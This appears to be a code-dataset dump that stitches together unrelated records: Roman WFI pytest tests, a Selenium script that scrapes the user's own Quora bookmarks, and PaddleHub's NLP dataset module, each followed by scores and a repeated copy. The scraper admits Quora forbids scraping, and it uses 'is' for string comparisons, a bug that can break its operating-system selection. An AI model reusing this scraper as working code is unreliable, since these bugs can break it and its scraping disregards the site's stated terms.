assert wfi._pupil_controller._auto_pupil_mask, "Pupil mask is locked and should not be"
# Test effect of changing the filter on pupil path
for filter in wfi.filter_list:
wfi.filter = filter
assert wfi.pupil == pupil_path(wfi), f"Pupil was not set to correct value for filter {filter}"
# Test persistence of pupil and pupil mask locks through a PSF calculation
wfi2 = roman.WFI()
wfi2.detector = detector
valid_pos = (4000, 1000)
wfi2.detector_position = valid_pos
wfi2.filter = "F129"
wfi2.lock_pupil_mask("GRISM")
wfi2.filter = "F129"
assert wfi2.pupil == pupil_path(wfi2, "GRISM"), "Pupil path was not set correctly"
wfi2.calc_psf(monochromatic=1.3e-6, fov_pixels=4)
assert wfi.pupil_mask == "GRISM", "Pupil mask changed during PSF calculation"
assert wfi2.pupil == pupil_path(wfi2, "GRISM"), "Pupil path changed during PSF calculation"
def test_WFI_detector_position_setter():
wfi = roman.WFI()
wfi.detector = 'SCA01'
valid_pos = (4000, 1000)
wfi.detector_position = valid_pos
assert wfi._detectors[wfi._detector].field_position == valid_pos, (
"Setting field position through Instrument.detector_position did not update field_position "
"for the detector's aberration optic"
)
assert wfi.detector_position == valid_pos, "`detector_position` getter doesn't reflect " \
"assignment to setter"
def test_WFI_includes_aberrations():
wfi = roman.WFI()
wfi.detector = 'SCA01'
osys = wfi.get_optical_system()
assert isinstance(osys[2], roman.FieldDependentAberration), (
"Third plane of Roman WFI optical system should be the "
"field dependent aberration virtual optic"
)
def test_swapping_modes(wfi=None):
if wfi is None:
wfi = roman.WFI()
# change detector string to match file format (e.g., "SCA01" -> "SCA_1")
detector_substr = lambda det: f"{det[:3]}_{str(int((det[3:])))}"
# dynamically generate current pupil path for a given WFI instance
pupil_path = (
lambda self, mask=None: os.path.join(
self._pupil_controller._pupil_basepath,
self._pupil_controller.pupil_file_formatters[self._pupil_controller._get_filter_mask(self.filter) if mask is None else mask]
).format(detector_substr(self.detector))
)
tests = [
# [filter, mode, pupil_file]
['F146', 'imaging', pupil_path],
['F213', 'imaging', pupil_path],
[PRISM_FILTERS[0], 'prism', pupil_path],
[GRISM_FILTERS[0], 'grism', pupil_path],
]
for test_filter, test_mode, test_pupil in tests:
wfi.filter = test_filter
fail_str = (f"failed on {test_filter}, {test_mode}, "
f"{test_pupil(wfi).split('/')[-1]}")
assert wfi.filter == test_filter, fail_str
assert wfi.mode == test_mode, fail_str
assert wfi._current_aberration_file == wfi._aberration_files[test_mode], fail_str
assert wfi.pupil == test_pupil(wfi), fail_str
def test_custom_aberrations():
wfi = roman.WFI()
# Use grism aberration_file for testing
test_aberration_file = wfi._aberration_files['grism']
# Test override
# -------------
wfi.lock_aberrations(test_aberration_file)
for filter in wfi.filter_list:
wfi.filter = filter
assert wfi._current_aberration_file == test_aberration_file, "Filter change caused override to fail"
# Test Release Override
# ---------------------
wfi.unlock_aberrations()
assert wfi._aberration_files['custom'] is None, "Custom aberration file not deleted on override release."
test_swapping_modes(wfi)
def test_WFI_limits_interpolation_range():
wfi = roman.WFI()
det = wfi._detectors['SCA01']
det.get_aberration_terms(1.29e-6)
det.field_position = (0, 0)
det.get_aberration_terms(1.29e-6)
with pytest.raises(ValueError) as excinfo:
det.field_position = (500000, 0)
assert 'Requested pixel_x position' in str(excinfo.value), (
"FieldDependentAberration did not error on out-of-bounds field point"
)
with pytest.raises(ValueError) as excinfo:
det.field_position = (-1, 0)
assert 'Requested pixel_x position' in str(excinfo.value), (
"FieldDependentAberration did not error on out-of-bounds field point"
)
with pytest.raises(ValueError) as excinfo:
det.field_position = (0, 500000)
assert 'Requested pixel_y position' in str(excinfo.value), (
"FieldDependentAberration did not error on out-of-bounds field point"
)
with pytest.raises(ValueError) as excinfo:
det.field_position = (0, -1)
assert 'Requested pixel_y position' in str(excinfo.value), (
"FieldDependentAberration did not error on out-of-bounds field point"
)
det.field_position = (2048, 2048)
# Get min and max valid wavelengths from aberration file
zern = Table.read(wfi._aberration_files[wfi.mode], format='ascii.csv')
min_wv = zern['wavelength'][0] * 1e-6 # convert from micron to meter
max_wv = zern['wavelength'][-1] * 1e-6
# Test that get_aberration_terms() uses an approximated wavelength when
# called with an out-of-bounds wavelength.
too_lo_wv = min_wv * .9; too_hi_wv = max_wv / .9
valid_wv = np.mean([min_wv, max_wv])
assert allclose(det.get_aberration_terms(min_wv),
det.get_aberration_terms(too_lo_wv)), (
"Aberration below wavelength range did not return closest value."
)
assert allclose(det.get_aberration_terms(max_wv),
det.get_aberration_terms(too_hi_wv)), (
"Aberration above wavelength range did not return closest value."
)
# Test border pixels outside the ref data. In Cycle 9, (0, 37) is the first
# pixel, so we check if (0, 0) is approximated to it as the nearest point.
det.field_position = (0, 0)
coefficients_outlier = det.get_aberration_terms(valid_wv)
det.field_position = (0, 37)
coefficients_data = det.get_aberration_terms(valid_wv)
assert np.allclose(coefficients_outlier, coefficients_data), "nearest point extrapolation " \
"failed for outlier field point"
def test_CGI_detector_position():
""" Test existence of the CGI detector position etc, and that you can't set it."""
cgi = roman.CGI()
valid_pos = (512,512)
assert cgi.detector_position == valid_pos, "CGI detector position isn't as expected"
with pytest.raises(RuntimeError) as excinfo:
cgi.detector_position = valid_pos
assert 'not adjustable' in str(excinfo.value), ("Failed to raise exception for"\
"trying to change CGI detector position.")
def test_CGI_psf(display=False):
"""
Just test that instantiating CGI works and can compute a PSF without raising
any exceptions
"""
char_spc = roman.CGI()
char_spc.mode = 'CHARSPC_F660'
#print('Reading instrument data from {:s}'.format(charspc._WebbPSF_basepath)
#print('Filter list: {:}'.format(charspc.filter_list))
monopsf = char_spc.calc_psf(nlambda=1, display=False)
if display:
roman.poppy.display_psf(monopsf)
| 0.770033 | 0.359224 |
from selenium import webdriver
from selenium.webdriver import ActionChains
from bs4 import BeautifulSoup
from time import sleep
from selenium.webdriver.common.keys import Keys
from file_io import *
import textwrap
print('Thank you for using Simple Quora Backup')
print('This will backup your BOOKMARKS to a text file in the simplest form, ')
print('so there are no images, links, etc, just simple text')
print('This is just in case Quora disappears some day :)')
print('\n')
print('NOTE:', 'Chrome WebDriver is buggy so it gets stuck sometimes during login or loading pages')
print('if that happens just close it and run the script again.')
print('\n')
boolean = True
osType = None
bit = None
path = None
while boolean:
osType = input('Please type in your operating system (windows, mac, linux)')
if osType == 'windows':
path = "WebDriver/win/chromedriver"
break
elif osType is 'mac':
path = "WebDriver/mac/chromedriver"
break
elif osType is 'linux':
while boolean:
bit = input('Please choose your version (64-bit, 32-bit)')
if bit is '64':
path = "WebDriver/linux/64/chromedriver"
break
elif bit is '32':
path = "WebDriver/linux/32/chromedriver"
break
break
email = None
password = None
while boolean:
email = input('Please type in your Quora account email: ')
if email is not None:
break
while boolean:
password = input('Please type in your Quora account password: ')
if password is not None:
break
# print(email + ' ' + password)
numOfScrolls = 0
num = 0
while boolean:
numOfScrolls1 = input('How many Bookmarks do you have (approximately)?')
if numOfScrolls1 is not None:
numOfScrolls = int(numOfScrolls1)
if numOfScrolls >= 10:
num = numOfScrolls / 10
else:
num = 2
break
print('NOTE: Saving BOOKMARKS is very slow, because Quora has lazy loading and it forbids scraping.')
print('The program has to manually scroll to load and then expand all the BOOKMARKS')
print('I had 290-300 answers and it took 11-12 minutes so you do the math :)')
print('\n')
print('There is no easy way around this, so go grab a cup of coffee/tea and do something else until this is done')
print('To do this by hand would take you several HOURS, instead this will only take several MINUTES.')
print('\n')
print('Starting Chrome WebDriver...')
browser = webdriver.Chrome(executable_path=path)
browser.get('https://www.quora.com/bookmarked_answers')
browser.maximize_window()
sleep(2)
quoraElems = browser.find_elements_by_xpath("//form/div/div/input")
emailQuora = quoraElems[0]
passwordQuora = quoraElems[1]
emailQuora.send_keys(email)
passwordQuora.send_keys(password)
passwordQuora.send_keys(Keys.RETURN)
sleep(2)
browser.get('https://www.quora.com/bookmarked_answers')
sleep(3)
print('Scrolling to load all BOOKMARKS...')
i = 0
while i < num:
browser.execute_script('window.scrollTo(0, document.body.scrollHeight);')
sleep(4)
i += 1
# identifies answers to be expanded by the '(more)' element
answers = browser.find_elements_by_link_text('(more)')
print('Expanding BOOKMARKS...')
j = 1
for answer in answers:
if j < len(answers):
if j == 1:
browser.execute_script('window.scrollTo(0, 0);')
ActionChains(browser).click(answers[0]).perform()
j += 1
elif j < len(answers) - 1:
ActionChains(browser).move_to_element(answers[j]).click(answer).perform()
j += 1
if j == len(answers) - 1:
ActionChains(browser).move_to_element(answers[j]).click(answers[j-1]).perform()
continue
if j == len(answers) - 1:
browser.execute_script('window.scrollTo(0, document.body.scrollHeight);')
ActionChains(browser).click(answers[j]).perform()
break
sleep(2)
# after the scrolling and the clicking is done, the scraping can begin :)
html = browser.page_source
browser.close()
browser = None
soup = BeautifulSoup(html, 'html.parser')
# create the directory and the reading_list text file which has all the content in it
dir_name = 'Quora Reading List'
create_project_dir(dir_name)
create_data_file(dir_name, '')
print('Saving to file (reading_list.txt)...')
count = 1
# iterate through all items in the list
for item_list in soup.find_all('div', {'class': 'PagedList ReadLaterList'}):
for list_item in item_list.find_all('div', {'class': 'pagedlist_item'}):
# get question title
question_title = list_item.find('span', {'class': 'question_text'})
# In case it's not a question (probably blog post)
if question_title is None:
question_title = list_item.find('a', {'class': 'BoardItemTitle'})
# write the question title to the text file
content = str(count) + ' QUESTION TITLE: ' + question_title.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
count += 1
# check for expanded question/answer text
answer_content = list_item.find('div', {'class': 'ExpandedQText ExpandedAnswer'})
if answer_content is None:
# In case it's not an answer (probably a blog post)
answer_content = list_item.find('span', {'class': 'inline_editor_value'})
if answer_content is not None:
rendered_qtext_all = answer_content.find_all('span', {'class': 'rendered_qtext'})
# In case it's neither
else:
continue
else:
rendered_qtext_all = answer_content.find_all('span', {'class': 'rendered_qtext'})
if rendered_qtext_all is not None:
for piece in rendered_qtext_all:
plain_text = False
for element in piece:
# check for paragraphs
if element.name == 'p':
elem = element.attrs
if 'qtext_para' in elem['class']:
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
# check for ordered lists
elif element.name == 'ol':
ol_elements = element.find_all('li')
counter = 1
for li in ol_elements:
content = str(counter) + ' ' + li.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
counter += 1
# check for code-boxes (which are ordered lists)
elif element.name == 'pre':
sub_element = element.find('ol', {'class': 'linenums'})
if sub_element.name == 'ol':
ol_elements = sub_element.find_all('li')
counter = 1
for li in ol_elements:
content = str(counter) + ' ' + li.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
counter += 1
# check for unordered lists
elif element.name == 'ul':
ul_elements = element.find_all('li')
for li in ul_elements:
content = li.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
# check for images
elif element.name == 'div':
elem = element.attrs
if 'qtext_image_wrapper' in elem['class']:
writing = 'img source'.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
# check for HTML breaks
elif element.name == 'br':
continue
# check for plain text
else:
if element.name == 'hr':
continue
elif element.name == 'blockquote':
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
elif element.name == 'span':
atr = element.attrs
if 'qlink_conainer' in atr['class']:
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
else:
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
elif element.name == 'i':
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
elif element.name == 'b':
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
else:
content = str(element)
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
continue
print('Done.')
print('Your BOOKMARKS are saved in Quora Reading List/reading_list.txt')
|
backup_bookmarks.py
|
from selenium import webdriver
from selenium.webdriver import ActionChains
from bs4 import BeautifulSoup
from time import sleep
from selenium.webdriver.common.keys import Keys
from file_io import *
import textwrap
print('Thank you for using Simple Quora Backup')
print('This will backup your BOOKMARKS to a text file in the simplest form, ')
print('so there are no images, links, etc, just simple text')
print('This is just in case Quora disappears some day :)')
print('\n')
print('NOTE:', 'Chrome WebDriver is buggy so it gets stuck sometimes during login or loading pages')
print('if that happens just close it and run the script again.')
print('\n')
boolean = True
osType = None
bit = None
path = None
while boolean:
osType = input('Please type in your operating system (windows, mac, linux)')
if osType == 'windows':
path = "WebDriver/win/chromedriver"
break
elif osType is 'mac':
path = "WebDriver/mac/chromedriver"
break
elif osType is 'linux':
while boolean:
bit = input('Please choose your version (64-bit, 32-bit)')
if bit is '64':
path = "WebDriver/linux/64/chromedriver"
break
elif bit is '32':
path = "WebDriver/linux/32/chromedriver"
break
break
email = None
password = None
while boolean:
email = input('Please type in your Quora account email: ')
if email is not None:
break
while boolean:
password = input('Please type in your Quora account password: ')
if password is not None:
break
# print(email + ' ' + password)
numOfScrolls = 0
num = 0
while boolean:
numOfScrolls1 = input('How many Bookmarks do you have (approximately)?')
if numOfScrolls1 is not None:
numOfScrolls = int(numOfScrolls1)
if numOfScrolls >= 10:
num = numOfScrolls / 10
else:
num = 2
break
print('NOTE: Saving BOOKMARKS is very slow, because Quora has lazy loading and it forbids scraping.')
print('The program has to manually scroll to load and then expand all the BOOKMARKS')
print('I had 290-300 answers and it took 11-12 minutes so you do the math :)')
print('\n')
print('There is no easy way around this, so go grab a cup of coffee/tea and do something else until this is done')
print('To do this by hand would take you several HOURS, instead this will only take several MINUTES.')
print('\n')
print('Starting Chrome WebDriver...')
browser = webdriver.Chrome(executable_path=path)
browser.get('https://www.quora.com/bookmarked_answers')
browser.maximize_window()
sleep(2)
quoraElems = browser.find_elements_by_xpath("//form/div/div/input")
emailQuora = quoraElems[0]
passwordQuora = quoraElems[1]
emailQuora.send_keys(email)
passwordQuora.send_keys(password)
passwordQuora.send_keys(Keys.RETURN)
sleep(2)
browser.get('https://www.quora.com/bookmarked_answers')
sleep(3)
print('Scrolling to load all BOOKMARKS...')
i = 0
while i < num:
browser.execute_script('window.scrollTo(0, document.body.scrollHeight);')
sleep(4)
i += 1
# identifies answers to be expanded by the '(more)' element
answers = browser.find_elements_by_link_text('(more)')
print('Expanding BOOKMARKS...')
j = 1
for answer in answers:
if j < len(answers):
if j == 1:
browser.execute_script('window.scrollTo(0, 0);')
ActionChains(browser).click(answers[0]).perform()
j += 1
elif j < len(answers) - 1:
ActionChains(browser).move_to_element(answers[j]).click(answer).perform()
j += 1
if j == len(answers) - 1:
ActionChains(browser).move_to_element(answers[j]).click(answers[j-1]).perform()
continue
if j == len(answers) - 1:
browser.execute_script('window.scrollTo(0, document.body.scrollHeight);')
ActionChains(browser).click(answers[j]).perform()
break
sleep(2)
# after the scrolling and the clicking is done, the scraping can begin :)
html = browser.page_source
browser.close()
browser = None
soup = BeautifulSoup(html, 'html.parser')
# create the directory and the reading_list text file which has all the content in it
dir_name = 'Quora Reading List'
create_project_dir(dir_name)
create_data_file(dir_name, '')
print('Saving to file (reading_list.txt)...')
count = 1
# iterate through all items in the list
for item_list in soup.find_all('div', {'class': 'PagedList ReadLaterList'}):
for list_item in item_list.find_all('div', {'class': 'pagedlist_item'}):
# get question title
question_title = list_item.find('span', {'class': 'question_text'})
# In case it's not a question (probably blog post)
if question_title is None:
question_title = list_item.find('a', {'class': 'BoardItemTitle'})
# write the question title to the text file
content = str(count) + ' QUESTION TITLE: ' + question_title.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
count += 1
# check for expanded question/answer text
answer_content = list_item.find('div', {'class': 'ExpandedQText ExpandedAnswer'})
if answer_content is None:
# In case it's not an answer (probably a blog post)
answer_content = list_item.find('span', {'class': 'inline_editor_value'})
if answer_content is not None:
rendered_qtext_all = answer_content.find_all('span', {'class': 'rendered_qtext'})
# In case it's neither
else:
continue
else:
rendered_qtext_all = answer_content.find_all('span', {'class': 'rendered_qtext'})
if rendered_qtext_all is not None:
for piece in rendered_qtext_all:
plain_text = False
for element in piece:
# check for paragraphs
if element.name == 'p':
elem = element.attrs
if 'qtext_para' in elem['class']:
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
# check for ordered lists
elif element.name == 'ol':
ol_elements = element.find_all('li')
counter = 1
for li in ol_elements:
content = str(counter) + ' ' + li.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
counter += 1
# check for code-boxes (which are ordered lists)
elif element.name == 'pre':
sub_element = element.find('ol', {'class': 'linenums'})
if sub_element.name == 'ol':
ol_elements = sub_element.find_all('li')
counter = 1
for li in ol_elements:
content = str(counter) + ' ' + li.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
counter += 1
# check for unordered lists
elif element.name == 'ul':
ul_elements = element.find_all('li')
for li in ul_elements:
content = li.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
# check for images
elif element.name == 'div':
elem = element.attrs
if 'qtext_image_wrapper' in elem['class']:
writing = 'img source'.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
# check for HTML breaks
elif element.name == 'br':
continue
# check for plain text
else:
if element.name == 'hr':
continue
elif element.name == 'blockquote':
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
elif element.name == 'span':
atr = element.attrs
if 'qlink_conainer' in atr['class']:
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
else:
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
elif element.name == 'i':
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
elif element.name == 'b':
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
else:
content = str(element)
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
continue
print('Done.')
print('Your BOOKMARKS are saved in Quora Reading List/reading_list.txt')
| 0.162812 | 0.075414 |
from typing import Dict, List, Optional, Union, Tuple
import csv
import io
import os
import numpy as np
import paddle
from paddlehub.env import DATA_HOME
from paddlehub.text.bert_tokenizer import BertTokenizer
from paddlehub.text.tokenizer import CustomTokenizer
from paddlehub.utils.log import logger
from paddlehub.utils.utils import download
from paddlehub.utils.xarfile import is_xarfile, unarchive
class InputExample(object):
"""
The input data structure of Transformer modules (BERT, ERNIE and so on).
"""
def __init__(self, guid: int, text_a: str, text_b: Optional[str] = None, label: Optional[str] = None):
"""
The input data structure.
Args:
guid (:obj:`int`):
Unique id for the input data.
text_a (:obj:`str`, `optional`, defaults to :obj:`None`):
The first sequence. For single sequence tasks, only this sequence must be specified.
text_b (:obj:`str`, `optional`, defaults to :obj:`None`):
The second sequence if sentence-pair.
label (:obj:`str`, `optional`, defaults to :obj:`None`):
The label of the example.
Examples:
.. code-block:: python
from paddlehub.datasets.base_nlp_dataset import InputExample
example = InputExample(guid=0,
text_a='15.4寸笔记本的键盘确实爽,基本跟台式机差不多了',
text_b='蛮喜欢数字小键盘,输数字特方便,样子也很美观,做工也相当不错',
label='1')
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label
def __str__(self):
if self.text_b is None:
return "text={}\tlabel={}".format(self.text_a, self.label)
else:
return "text_a={}\ttext_b={},label={}".format(self.text_a, self.text_b, self.label)
class BaseNLPDataset(object):
"""
The virtual base class for nlp datasets, such TextClassificationDataset, SeqLabelingDataset, and so on.
The base class must be supered and re-implemented the method _read_file.
"""
def __init__(self,
base_path: str,
tokenizer: Union[BertTokenizer, CustomTokenizer],
max_seq_len: Optional[int] = 128,
mode: Optional[str] = "train",
data_file: Optional[str] = None,
label_file: Optional[str] = None,
label_list: Optional[List[str]] = None):
"""
Ags:
base_path (:obj:`str`): The directory to the whole dataset.
tokenizer (:obj:`BertTokenizer` or :obj:`CustomTokenizer`):
It tokenizes the text and encodes the data as model needed.
max_seq_len (:obj:`int`, `optional`, defaults to :128):
If set to a number, will limit the total sequence returned so that it has a maximum length.
mode (:obj:`str`, `optional`, defaults to `train`):
It identifies the dataset mode (train, test or dev).
data_file(:obj:`str`, `optional`, defaults to :obj:`None`):
The data file name, which is relative to the base_path.
label_file(:obj:`str`, `optional`, defaults to :obj:`None`):
The label file name, which is relative to the base_path.
It is all labels of the dataset, one line one label.
label_list(:obj:`List[str]`, `optional`, defaults to :obj:`None`):
The list of all labels of the dataset
"""
self.data_file = os.path.join(base_path, data_file)
self.label_list = label_list
self.mode = mode
self.tokenizer = tokenizer
self.max_seq_len = max_seq_len
if label_file:
self.label_file = os.path.join(base_path, label_file)
if not self.label_list:
self.label_list = self._load_label_data()
else:
logger.warning("As label_list has been assigned, label_file is noneffective")
if self.label_list:
self.label_map = {item: index for index, item in enumerate(self.label_list)}
def _load_label_data(self):
"""
Loads labels from label file.
"""
if os.path.exists(self.label_file):
with open(self.label_file, "r", encoding="utf8") as f:
return f.read().strip().split("\n")
else:
raise RuntimeError("The file {} is not found.".format(self.label_file))
def _download_and_uncompress_dataset(self, destination: str, url: str):
"""
Downloads dataset and uncompresses it.
Args:
destination (:obj:`str`): The dataset cached directory.
url (:obj: str): The link to be downloaded a dataset.
"""
if not os.path.exists(destination):
dataset_package = download(url=url, path=DATA_HOME)
if is_xarfile(dataset_package):
unarchive(dataset_package, DATA_HOME)
else:
logger.info("Dataset {} already cached.".format(destination))
def _read_file(self, input_file: str, is_file_with_header: bool = False):
"""
Reads the files.
Args:
input_file (:obj:str) : The file to be read.
is_file_with_header(:obj:bool, `optional`, default to :obj: False) :
Whether or not the file is with the header introduction.
"""
raise NotImplementedError
def get_labels(self):
"""
Gets all labels.
"""
return self.label_list
class TextClassificationDataset(BaseNLPDataset, paddle.io.Dataset):
"""
The dataset class which is fit for all datatset of text classification.
"""
def __init__(self,
base_path: str,
tokenizer: Union[BertTokenizer, CustomTokenizer],
max_seq_len: int = 128,
mode: str = "train",
data_file: str = None,
label_file: str = None,
label_list: list = None,
is_file_with_header: bool = False):
"""
Ags:
base_path (:obj:`str`): The directory to the whole dataset.
tokenizer (:obj:`BertTokenizer` or :obj:`CustomTokenizer`):
It tokenizes the text and encodes the data as model needed.
max_seq_len (:obj:`int`, `optional`, defaults to :128):
If set to a number, will limit the total sequence returned so that it has a maximum length.
mode (:obj:`str`, `optional`, defaults to `train`):
It identifies the dataset mode (train, test or dev).
data_file(:obj:`str`, `optional`, defaults to :obj:`None`):
The data file name, which is relative to the base_path.
label_file(:obj:`str`, `optional`, defaults to :obj:`None`):
The label file name, which is relative to the base_path.
It is all labels of the dataset, one line one label.
label_list(:obj:`List[str]`, `optional`, defaults to :obj:`None`):
The list of all labels of the dataset
is_file_with_header(:obj:bool, `optional`, default to :obj: False) :
Whether or not the file is with the header introduction.
"""
super(TextClassificationDataset, self).__init__(
base_path=base_path,
tokenizer=tokenizer,
max_seq_len=max_seq_len,
mode=mode,
data_file=data_file,
label_file=label_file,
label_list=label_list)
self.examples = self._read_file(self.data_file, is_file_with_header)
self.records = self._convert_examples_to_records(self.examples)
def _read_file(self, input_file, is_file_with_header: bool = False) -> List[InputExample]:
"""
Reads a tab separated value file.
Args:
input_file (:obj:str) : The file to be read.
is_file_with_header(:obj:bool, `optional`, default to :obj: False) :
Whether or not the file is with the header introduction.
Returns:
examples (:obj:`List[InputExample]`): All the input data.
"""
if not os.path.exists(input_file):
raise RuntimeError("The file {} is not found.".format(input_file))
else:
with io.open(input_file, "r", encoding="UTF-8") as f:
reader = csv.reader(f, delimiter="\t", quotechar=None)
examples = []
seq_id = 0
header = next(reader) if is_file_with_header else None
for line in reader:
example = InputExample(guid=seq_id, label=line[0], text_a=line[1])
seq_id += 1
examples.append(example)
return examples
def _convert_examples_to_records(self, examples: List[InputExample]) -> List[dict]:
"""
Converts all examples to records which the model needs.
Args:
examples(obj:`List[InputExample]`): All data examples returned by _read_file.
Returns:
records(:obj:`List[dict]`): All records which the model needs.
"""
records = []
for example in examples:
record = self.tokenizer.encode(text=example.text_a, text_pair=example.text_b, max_seq_len=self.max_seq_len)
# CustomTokenizer will tokenize the text firstly and then lookup words in the vocab
# When all words are not found in the vocab, the text will be dropped.
if not record:
logger.info(
"The text %s has been dropped as it has no words in the vocab after tokenization." % example.text_a)
continue
if example.label:
record['label'] = self.label_map[example.label]
records.append(record)
return records
def __getitem__(self, idx):
record = self.records[idx]
if 'label' in record.keys():
return np.array(record['input_ids']), np.array(record['segment_ids']), np.array(record['label'], dtype=np.int64)
else:
return np.array(record['input_ids']), np.array(record['segment_ids'])
def __len__(self):
return len(self.records)
class SeqLabelingDataset(BaseNLPDataset, paddle.io.Dataset):
def __init__(self,
base_path: str,
tokenizer: Union[BertTokenizer, CustomTokenizer],
max_seq_len: int = 128,
mode: str = "train",
data_file: str = None,
label_file: str = None,
label_list: list = None,
split_char: str ="\002",
no_entity_label: str = "O",
ignore_label: int = -100,
is_file_with_header: bool = False):
super(SeqLabelingDataset, self).__init__(
base_path=base_path,
tokenizer=tokenizer,
max_seq_len=max_seq_len,
mode=mode,
data_file=data_file,
label_file=label_file,
label_list=label_list)
self.no_entity_label = no_entity_label
self.split_char = split_char
self.ignore_label = ignore_label
self.examples = self._read_file(self.data_file, is_file_with_header)
self.records = self._convert_examples_to_records(self.examples)
def _read_file(self, input_file, is_file_with_header: bool = False) -> List[InputExample]:
"""Reads a tab separated value file."""
if not os.path.exists(input_file):
raise RuntimeError("The file {} is not found.".format(input_file))
else:
with io.open(input_file, "r", encoding="UTF-8") as f:
reader = csv.reader(f, delimiter="\t", quotechar=None)
examples = []
seq_id = 0
header = next(reader) if is_file_with_header else None
for line in reader:
example = InputExample(guid=seq_id, label=line[1], text_a=line[0])
seq_id += 1
examples.append(example)
return examples
def _convert_examples_to_records(self, examples: List[InputExample]) -> List[dict]:
"""
Returns a list[dict] including all the input information what the model need.
Args:
examples (list): the data examples, returned by _read_file.
Returns:
a list with all the examples record.
"""
records = []
for example in examples:
tokens, labels = self._reseg_token_label(
tokens=example.text_a.split(self.split_char),
labels=example.label.split(self.split_char))
record = self.tokenizer.encode(
text=tokens, max_seq_len=self.max_seq_len)
# CustomTokenizer will tokenize the text firstly and then lookup words in the vocab
# When all words are not found in the vocab, the text will be dropped.
if not record:
logger.info(
"The text %s has been dropped as it has no words in the vocab after tokenization."
% example.text_a)
continue
if labels:
record["label"] = []
tokens_with_specical_token = self.tokenizer.convert_ids_to_tokens(record['input_ids'])
tokens_index = 0
for token in tokens_with_specical_token:
if tokens_index < len(
tokens) and token == tokens[tokens_index]:
record["label"].append(
self.label_list.index(labels[tokens_index]))
tokens_index += 1
elif token in [self.tokenizer.pad_token]:
record["label"].append(self.ignore_label) # label of special token
else:
record["label"].append(
self.label_list.index(self.no_entity_label))
records.append(record)
return records
def _reseg_token_label(
self, tokens: List[str], labels: List[str] = None) -> Tuple[List[str], List[str]] or List[str]:
if labels:
if len(tokens) != len(labels):
raise ValueError(
"The length of tokens must be same with labels")
ret_tokens = []
ret_labels = []
for token, label in zip(tokens, labels):
sub_token = self.tokenizer(token)
if len(sub_token) == 0:
continue
ret_tokens.extend(sub_token)
ret_labels.append(label)
if len(sub_token) < 2:
continue
sub_label = label
if label.startswith("B-"):
sub_label = "I-" + label[2:]
ret_labels.extend([sub_label] * (len(sub_token) - 1))
if len(ret_tokens) != len(ret_labels):
raise ValueError(
"The length of ret_tokens can't match with labels")
return ret_tokens, ret_labels
else:
ret_tokens = []
for token in tokens:
sub_token = self.tokenizer(token)
if len(sub_token) == 0:
continue
ret_tokens.extend(sub_token)
if len(sub_token) < 2:
continue
return ret_tokens, None
def __getitem__(self, idx):
record = self.records[idx]
if 'label' in record.keys():
return np.array(record['input_ids']), np.array(record['segment_ids']), np.array(record['seq_len']), np.array(record['label'], dtype=np.int64)
else:
return np.array(record['input_ids']), np.array(record['segment_ids']), np.array(record['seq_len'])
def __len__(self):
return len(self.records)
|
paddlehub/datasets/base_nlp_dataset.py
|
from typing import Dict, List, Optional, Union, Tuple
import csv
import io
import os
import numpy as np
import paddle
from paddlehub.env import DATA_HOME
from paddlehub.text.bert_tokenizer import BertTokenizer
from paddlehub.text.tokenizer import CustomTokenizer
from paddlehub.utils.log import logger
from paddlehub.utils.utils import download
from paddlehub.utils.xarfile import is_xarfile, unarchive
class InputExample(object):
"""
The input data structure of Transformer modules (BERT, ERNIE and so on).
"""
def __init__(self, guid: int, text_a: str, text_b: Optional[str] = None, label: Optional[str] = None):
"""
The input data structure.
Args:
guid (:obj:`int`):
Unique id for the input data.
text_a (:obj:`str`, `optional`, defaults to :obj:`None`):
The first sequence. For single sequence tasks, only this sequence must be specified.
text_b (:obj:`str`, `optional`, defaults to :obj:`None`):
The second sequence if sentence-pair.
label (:obj:`str`, `optional`, defaults to :obj:`None`):
The label of the example.
Examples:
.. code-block:: python
from paddlehub.datasets.base_nlp_dataset import InputExample
example = InputExample(guid=0,
text_a='15.4寸笔记本的键盘确实爽,基本跟台式机差不多了',
text_b='蛮喜欢数字小键盘,输数字特方便,样子也很美观,做工也相当不错',
label='1')
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label
def __str__(self):
if self.text_b is None:
return "text={}\tlabel={}".format(self.text_a, self.label)
else:
